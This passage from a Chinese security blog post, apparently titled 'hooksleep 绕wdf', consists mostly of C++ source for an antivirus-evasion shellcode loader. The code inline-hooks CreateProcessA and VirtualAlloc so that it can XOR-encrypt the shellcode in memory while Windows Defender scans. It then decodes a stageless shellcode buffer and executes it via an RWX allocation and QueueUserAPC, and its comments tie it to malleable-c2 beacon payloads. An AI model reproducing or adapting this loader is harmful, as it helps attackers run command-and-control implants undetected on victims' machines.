class="hljs-keyword">include</span> <span class="hljs-string">&quot;windows.h&quot;</span></span><br><span class="hljs-keyword">using</span> <span class="hljs-keyword">namespace</span> std;<br><br><span class="hljs-keyword">struct</span> <span class="hljs-title class_">StructHook</span><br>&#123;<br>    string DLLName;<br>    string APIName;<br>    string DLLAndAPIName;<br>    FARPROC APIAddr; <span class="hljs-comment">// API地址</span><br>    <span class="hljs-type">void</span>* callback; <span class="hljs-comment">// 回调地址</span><br>    UINT8* oldBytes; <span class="hljs-comment">// 原来的字节码</span><br>    <span class="hljs-type">bool</span> isHooked;<br>&#125;;<br><br><span class="hljs-keyword">struct</span> <span class="hljs-title class_">StructOptions</span><br>&#123;<br>    LPCSTR lpApplicationName;<br>    LPSTR lpCommandLine;<br>    LPSECURITY_ATTRIBUTES lpProcessAttributes;<br>    LPSECURITY_ATTRIBUTES lpThreadAttributes;<br>    BOOL bInheritHandles;<br>    DWORD dwCreationFlags;<br>    LPVOID lpEnvironment;<br>    LPCSTR lpCurrentDirectory;<br>    LPSTARTUPINFOA lpStartupInfo;<br>    LPPROCESS_INFORMATION lpProcessInformation;<br>&#125; *optionsData;<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Hook</span><br>&#123;<br><span class="hljs-keyword">private</span>:<br>    <span class="hljs-type">static</span> StructHook hookData[<span class="hljs-number">2</span>];<br><br>    <span class="hljs-comment">// 整数指针地址 转 字节数组，0x00401000 -&gt; &#123;00 10 40 00&#125; </span><br>    <span class="hljs-comment">// x86 为 4</span><br>    <span class="hljs-function"><span class="hljs-type">static</span> UINT8* <span class="hljs-title">addrToBytes</span><span class="hljs-params">(<span class="hljs-type">void</span>* addr)</span></span><br><span class="hljs-function">    </span>&#123;<br>        UINT8* bytes = (UINT8*)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">8</span>);<br>        <span class="hljs-built_in">memcpy</span>(bytes, &amp;addr, <span class="hljs-number">8</span>);<br>        <span class="hljs-keyword">return</span> bytes;<br>    &#125;<br><br>    <span class="hljs-comment">// inline hook</span><br>    <span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">bool</span> <span class="hljs-title">writeMemory</span><span class="hljs-params">(StructHook* hookData)</span></span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">if</span> (hookData-&gt;APIAddr == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        MEMORY_BASIC_INFORMATION memoryInfo;<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">VirtualQueryEx</span>((HANDLE)<span class="hljs-number">-1</span>, (LPCVOID)hookData-&gt;callback, &amp;memoryInfo, <span class="hljs-built_in">sizeof</span>(memoryInfo)) != <span class="hljs-built_in">sizeof</span>(memoryInfo))<br>        &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br><br>        <span class="hljs-comment">//修改内存保护属性</span><br>        DWORD lpflOldProtect = <span class="hljs-number">0</span>;<br>        <span class="hljs-type">bool</span> isEditSuccess = <span class="hljs-built_in">VirtualProtectEx</span>(<br>            (HANDLE)<span class="hljs-number">-1</span>, memoryInfo.BaseAddress, <span class="hljs-number">8</span>, <span class="hljs-number">64</span>, &amp;lpflOldProtect<br>        );<br>        <span class="hljs-keyword">if</span> (isEditSuccess == <span class="hljs-number">0</span>) <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br><br>        <span class="hljs-comment">// x86</span><br>        <span class="hljs-comment">// mov eax,0EB291C9h</span><br>        <span class="hljs-comment">// jmp eax</span><br>        <span class="hljs-comment">//UINT8 asmBytes[7] = &#123; 0xB8,0,0,0,0,0xFF,0xE0 &#125;;</span><br><br>        <span class="hljs-comment">// x64</span><br>        <span class="hljs-comment">// mov rax,1A1A1A1A1A1A1A1Ah</span><br>        <span class="hljs-comment">// jmp rax</span><br>        UINT8 asmBytes[<span class="hljs-number">12</span>] = &#123; <span class="hljs-number">0x48</span>,<span class="hljs-number">0xb8</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0xFF</span>,<span class="hljs-number">0xE0</span> &#125;;<br>        <span class="hljs-keyword">if</span> (hookData-&gt;isHooked)<br>        &#123;<br>            <span class="hljs-comment">// 若已经被HOOK，则暂停hook,字节码恢复为初始的状态；</span><br>            <span class="hljs-comment">// x86 为 7</span><br>            <span class="hljs-built_in">memcpy</span>(asmBytes, hookData-&gt;oldBytes, <span class="hljs-number">12</span>);<br>            hookData-&gt;isHooked = <span class="hljs-literal">false</span>;<br>        &#125;<br>        <span class="hljs-keyword">else</span><br>        &#123;<br>            <span class="hljs-comment">// 若未被HOOK，则将我们的回调地址写汇编。</span><br>            <span class="hljs-comment">// x86 地址为 4, asmBytes + 1</span><br>            <span class="hljs-built_in">memcpy</span>(asmBytes + <span class="hljs-number">2</span>, <span class="hljs-built_in">addrToBytes</span>(hookData-&gt;callback), <span class="hljs-number">8</span>);<br>            hookData-&gt;isHooked = <span class="hljs-literal">true</span>;<br>        &#125;<br><br>        <span class="hljs-comment">// 将汇编指令写入到内存中</span><br>        <span class="hljs-comment">// x86 为 7</span><br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">WriteProcessMemory</span>((HANDLE)<span class="hljs-number">-1</span>, hookData-&gt;APIAddr, asmBytes, <span class="hljs-number">12</span>, <span class="hljs-literal">NULL</span>)) <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br><br><span class="hljs-keyword">public</span>:<br>    <span class="hljs-comment">// 开始 hook</span><br>    <span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">bool</span> <span class="hljs-title">install</span><span class="hljs-params">(string DLLName, string APIName, <span class="hljs-type">void</span>* callBack, <span class="hljs-type">int</span> hookDataNumber)</span></span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-type">bool</span> isHookExist = <span class="hljs-literal">false</span>;<br>        <span class="hljs-type">int</span> index = <span class="hljs-number">-1</span>;<br><br>        HMODULE moduleH = <span class="hljs-built_in">GetModuleHandleA</span>(DLLName.<span class="hljs-built_in">c_str</span>());<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;callBack=%llx\n&quot;</span>, callBack);<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;moduleH=%llx\n&quot;</span>, moduleH);<br><br>        hookData[hookDataNumber].APIName = APIName;<br>        hookData[hookDataNumber].DLLName = DLLName;<br>        hookData[hookDataNumber].DLLAndAPIName = DLLName + APIName;<br><br>        hookData[hookDataNumber].APIAddr = <span class="hljs-built_in">GetProcAddress</span>(moduleH, APIName.<span class="hljs-built_in">c_str</span>());<br>        hookData[hookDataNumber].callback = callBack;<br>        <span class="hljs-comment">// 获取原来的字节码</span><br>        <span class="hljs-comment">// x86 为 7</span><br>        hookData[hookDataNumber].oldBytes = (UINT8*)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">12</span>);<br>        <span class="hljs-built_in">memcpy</span>(hookData[hookDataNumber].oldBytes, (<span class="hljs-type">void</span>*)hookData[hookDataNumber].APIAddr, <span class="hljs-number">12</span>);<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">writeMemory</span>(&amp;hookData[hookDataNumber]))<br>        &#123;<br>            hookData[hookDataNumber].isHooked = <span class="hljs-literal">true</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        &#125;<br>        <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 切换钩子状态</span><br>    <span class="hljs-comment">// 钩子被安装成功后，自动启动钩子；</span><br>    <span class="hljs-comment">// 通过调用该函数，可以切换钩子当前状态；停止挂钩 或者 启动挂钩</span><br>    <span class="hljs-function"><span class="hljs-type">static</span> <span class="hljs-type">bool</span> <span class="hljs-title">change</span><span class="hljs-params">(string DLLName, string APIName, <span class="hljs-type">int</span> hookDataNumber)</span></span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">writeMemory</span>(&amp;hookData[hookDataNumber])) <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br>&#125;;<br><br>StructHook Hook::hookData[<span class="hljs-number">2</span>];<br>HANDLE hThread;<br><span class="hljs-type">int</span> codeSize;<br>LPVOID bAddr;<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">MemoryTrick</span><span class="hljs-params">(StructOptions* optionsData)</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-comment">// 挂起线程</span><br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">SuspendThread</span>(hThread) == <span class="hljs-number">-1</span>)<br>    &#123;<br>        cout &lt;&lt; <span class="hljs-string">&quot;Suspend Thread error&quot;</span> &lt;&lt; endl;<br>    &#125;<br><br>    <span class="hljs-comment">// 修改内存属性，这里和 malleable-c2 配置文件属性有关，会改成 rx 权限</span><br>    DWORD oldprotect = <span class="hljs-number">0</span>;<br>    <span class="hljs-built_in">VirtualProtect</span>(bAddr, codeSize, PAGE_EXECUTE_READWRITE, &amp;oldprotect);<br><br>    <span class="hljs-comment">// 加密内存</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        ((<span class="hljs-type">char</span>*)bAddr)[i] = ((<span class="hljs-type">char</span>*)bAddr)[i] ^ <span class="hljs-number">11</span> ^ <span class="hljs-number">45</span> ^ <span class="hljs-number">14</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 运行真正的函数</span><br>    <span class="hljs-built_in">CreateProcessA</span>(<br>        optionsData-&gt;lpApplicationName,<br>        optionsData-&gt;lpCommandLine,<br>        optionsData-&gt;lpProcessAttributes,<br>        optionsData-&gt;lpThreadAttributes,<br>        optionsData-&gt;bInheritHandles,<br>        optionsData-&gt;dwCreationFlags,<br>        optionsData-&gt;lpEnvironment,<br>        optionsData-&gt;lpCurrentDirectory,<br>        optionsData-&gt;lpStartupInfo,<br>        optionsData-&gt;lpProcessInformation<br>    );<br><br>    <span class="hljs-comment">// 睡眠，等待 wd 扫描和运行结束</span><br>    <span class="hljs-built_in">Sleep</span>(<span class="hljs-number">5000</span>);<br><br>    <span class="hljs-comment">// 解密内存</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        ((<span class="hljs-type">char</span>*)bAddr)[i] = ((<span class="hljs-type">char</span>*)bAddr)[i] ^ <span class="hljs-number">11</span> ^ <span class="hljs-number">45</span> ^ <span class="hljs-number">14</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 恢复线程</span><br>    <span class="hljs-built_in">ResumeThread</span>(hThread);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">int</span> __fastcall <span class="hljs-title">MyCreateProcessA</span><span class="hljs-params">(</span></span><br><span class="hljs-params"><span class="hljs-function">    LPCSTR lpApplicationName,</span></span><br><span class="hljs-params"><span class="hljs-function">    LPSTR lpCommandLine, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPSECURITY_ATTRIBUTES lpProcessAttributes, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPSECURITY_ATTRIBUTES lpThreadAttributes, </span></span><br><span class="hljs-params"><span class="hljs-function">    BOOL bInheritHandles, </span></span><br><span class="hljs-params"><span class="hljs-function">    DWORD dwCreationFlags, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPVOID lpEnvironment, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPCSTR lpCurrentDirectory, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPSTARTUPINFOA lpStartupInfo, </span></span><br><span class="hljs-params"><span class="hljs-function">    LPPROCESS_INFORMATION lpProcessInformation)</span></span><br><span class="hljs-function"></span>&#123;<br>    cout &lt;&lt; <span class="hljs-string">&quot;into my CreateProcessA&quot;</span> &lt;&lt; endl;<br>    <br>    <span class="hljs-comment">// 给结构体赋值，因为创建线程只能传入结构体</span><br>    optionsData = (<span class="hljs-keyword">struct</span> StructOptions*)<span class="hljs-built_in">malloc</span>(<span class="hljs-built_in">sizeof</span>(<span class="hljs-keyword">struct</span> StructOptions));<br>    optionsData-&gt;lpApplicationName = lpApplicationName;<br>    optionsData-&gt;lpCommandLine = lpCommandLine;<br>    optionsData-&gt;lpProcessAttributes = lpProcessAttributes;<br>    optionsData-&gt;lpThreadAttributes = lpThreadAttributes;<br>    optionsData-&gt;bInheritHandles = bInheritHandles;<br>    optionsData-&gt;dwCreationFlags = dwCreationFlags;<br>    optionsData-&gt;lpEnvironment = lpEnvironment;<br>    optionsData-&gt;lpCurrentDirectory = lpCurrentDirectory;<br>    optionsData-&gt;lpStartupInfo = lpStartupInfo;<br>    optionsData-&gt;lpProcessInformation = lpProcessInformation;<br><br>    <span class="hljs-comment">// 解除 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::<span class="hljs-built_in">change</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;CreateProcessA&quot;</span>, <span class="hljs-number">0</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>    <span class="hljs-comment">// 创建一个新线程来完成操作</span><br>    HANDLE thread = <span class="hljs-built_in">CreateThread</span>(<span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, (LPTHREAD_START_ROUTINE)MemoryTrick, optionsData, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>);<br>    <span class="hljs-built_in">WaitForSingleObject</span>(thread, INFINITE);<br><br>    <span class="hljs-comment">// 重新 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::<span class="hljs-built_in">change</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;CreateProcessA&quot;</span>, <span class="hljs-number">0</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">RunCode</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">typedef</span> <span class="hljs-title">LPVOID</span><span class="hljs-params">(WINAPI* VAE)</span><span class="hljs-params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)</span></span>;<br><br>    <span class="hljs-comment">//stageless shellcode</span><br>    BYTE xor_shell[] = &#123;&#125;;<br>    <span class="hljs-type">char</span>* code;<br><br>    code = (<span class="hljs-type">char</span>*)xor_shell;<br>    codeSize = <span class="hljs-keyword">sizeof</span> xor_shell;<br><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; codeSize; i++)<br>    &#123;<br>        xor_shell[i] ^= <span class="hljs-number">20</span>;<br>    &#125;<br><br>    <span class="hljs-comment">// 获取当前线程句柄</span><br>    hThread = <span class="hljs-built_in">OpenThread</span>(THREAD_ALL_ACCESS, <span class="hljs-number">0</span>, <span class="hljs-built_in">GetCurrentThreadId</span>());<br>    VAE pVAE = (VAE)<span class="hljs-built_in">GetProcAddress</span>(<span class="hljs-built_in">GetModuleHandle</span>(<span class="hljs-string">L&quot;kernel32.dll&quot;</span>), <span class="hljs-string">&quot;VirtualAlloc&quot;</span>);<br>    bAddr = (<span class="hljs-type">char</span>*)<span class="hljs-built_in">pVAE</span>(<span class="hljs-number">0</span>, codeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br>    <span class="hljs-built_in">CopyMemory</span>(bAddr, xor_shell, codeSize);<br><br>    <span class="hljs-built_in">QueueUserAPC</span>((PAPCFUNC)bAddr, hThread, (ULONG_PTR)bAddr);<br>    <span class="hljs-built_in">SleepEx</span>(<span class="hljs-number">5</span>, <span class="hljs-number">1</span>);<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>&#125;<br><br><span class="hljs-comment">// 这里的调用约定 要与WINAPI一致，否则会出现堆栈不平衡的错误</span><br><span class="hljs-comment">// x86 为 stdcall</span><br><span class="hljs-function">LPVOID __fastcall <span class="hljs-title">MyVirttualAlloc</span><span class="hljs-params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)</span></span><br><span class="hljs-function"></span>&#123;<br>    cout &lt;&lt; <span class="hljs-string">&quot;into my VirttualAlloc&quot;</span> &lt;&lt; endl;<br>    <span class="hljs-comment">// 解除 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::<span class="hljs-built_in">change</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;VirtualAlloc&quot;</span>, <span class="hljs-number">1</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>    <span class="hljs-comment">// 解除 hook 后可调用原来的函数</span><br>    codeSize = dwSize;<br>    bAddr = <span class="hljs-built_in">VirtualAlloc</span>(lpAddress, dwSize, flAllocationType, flProtect);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;codeSize=%d\n&quot;</span>, dwSize);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;bAddr=%llx\n&quot;</span>, bAddr);<br><br>    <span class="hljs-comment">// 重新 hook</span><br>    <span class="hljs-keyword">if</span> (!Hook::<span class="hljs-built_in">change</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;VirtualAlloc&quot;</span>, <span class="hljs-number">1</span>)) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">return</span> bAddr;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br><span class="hljs-meta">#<span class="hljs-keyword">pragma</span> comment( linker, <span class="hljs-string">&quot;/subsystem:\&quot;windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span> )</span><br><br>    <span class="hljs-keyword">if</span> (Hook::<span class="hljs-built_in">install</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;CreateProcessA&quot;</span>, MyCreateProcessA, <span class="hljs-number">0</span>)<br>        &amp;&amp; Hook::<span class="hljs-built_in">install</span>(<span class="hljs-string">&quot;kernel32.dll&quot;</span>, <span class="hljs-string">&quot;VirtualAlloc&quot;</span>, MyVirttualAlloc, <span class="hljs-number">1</span>))<br>    &#123;<br>        cout &lt;&lt; <span class="hljs-string">&quot;hook Success&quot;</span> &lt;&lt; endl;<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>        cout &lt;&lt; <span class="hljs-string">&quot;hook Fail&quot;</span> &lt;&lt; endl;<br>    &#125;<br>    <span class="hljs-comment">//HWND hwnd = GetForegroundWindow();</span><br>    <span class="hljs-comment">//ShowWindow(hwnd, SW_HIDE);</span><br>    <span class="hljs-built_in">RunCode</span>();<br>&#125;<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%85%8D%E6%9D%80/" class="category-chain-item">免杀</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">#学习笔记</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>hooksleep 绕wdf</div>
      <div>http://example.com/2022/12/20/利用hook绕过windowsdefender动态查杀/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>December 20, 2022</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/12/%E4%B8%AA%E4%BA%BA%E6%94%B6%E9%9B%86redteam%E9%87%8D%E8%A6%81tips(2000%E8%A1%8C%2051898%E5%AD%97%E7%AC%A6)/" title="个人收集redteam重要tips(2000行 51898字符)">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">个人收集redteam重要tips(2000行 51898字符)</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/12/20/%E7%86%9F%E6%82%89%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%B8%97%E9%80%8F%E5%85%8D%E6%9D%80%E6%8C%87%E4%BB%A4/" title="注册表免杀">
                        <span class="hidden-mobile">注册表免杀</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
